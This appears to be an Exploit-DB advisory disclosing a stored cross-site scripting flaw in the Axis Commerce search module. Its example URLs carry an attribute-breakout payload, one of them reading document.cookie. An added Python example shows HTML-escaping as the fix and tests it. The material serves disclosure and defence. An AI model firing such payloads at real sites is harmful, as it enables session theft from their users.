Axis Commerce (E-Commerce System) – Persistent Cross-Site Scripting

  • Author: Eyup CELIK
    Date: 2011-08-20
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17703/
  • # Exploit Title: Axis Commerce (E-Commerce System) Stored XSS
    # Date: 19.08.2011
    # Author: Eyup CELIK
    # Software Link: https://github.com/downloads/axis/axiscommerce/axis-0.8.1.zip
    # Version: 0.8.1 and previous
    # Tested on: Apache (For Windows)
    
    ISSUE
    
    Vulnerable Modules => Search Module
    
    XSS can be performed through the search input (the q parameter in the examples below)
    
    Example Code: " onmouseover=prompt(XSS Code) bad="
    
    Example:
    
    http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(906764) bad="
    
    http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(document.cookie) bad="
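The payload above works by closing a double-quoted HTML attribute and adding an event-handler attribute of its own. The following is an added example, not code from the advisory or from Axis Commerce: it assumes a hypothetical template that echoes the search term into the `value` attribute of the search box, renders it without and with attribute encoding, and parses the result to check whether an `on*` attribute appears, which can serve as a regression test for the fix.

```python
import html
from html.parser import HTMLParser

# Hypothetical template (assumption): the search term is echoed back into the
# search box. The advisory does not show the application's real markup.
TEMPLATE = '<input type="text" name="q" value="{q}">'

# Sample input taken from the advisory's first example URL.
PAYLOAD = '" onmouseover=prompt(906764) bad="'


def render_unescaped(q: str) -> str:
    """The 'before' case: raw interpolation into a quoted attribute."""
    return TEMPLATE.format(q=q)


def render_escaped(q: str) -> str:
    """Hardened: encode &, <, >, double and single quotes before output."""
    return TEMPLATE.format(q=html.escape(q, quote=True))


class _InputAttrs(HTMLParser):
    """Collects the attributes of the <input> element as a parser sees them."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def input_attributes(markup: str) -> dict:
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def event_handlers(markup: str) -> list:
    """Names of on* attributes present on the rendered <input>."""
    return sorted(name for name in input_attributes(markup) if name.startswith("on"))


if __name__ == "__main__":
    print("unescaped:", event_handlers(render_unescaped(PAYLOAD)))
    print("escaped:  ", event_handlers(render_escaped(PAYLOAD)))
```

With encoding applied, the whole search term stays inside `value` and round-trips unchanged, so legitimate queries containing quotes still display correctly.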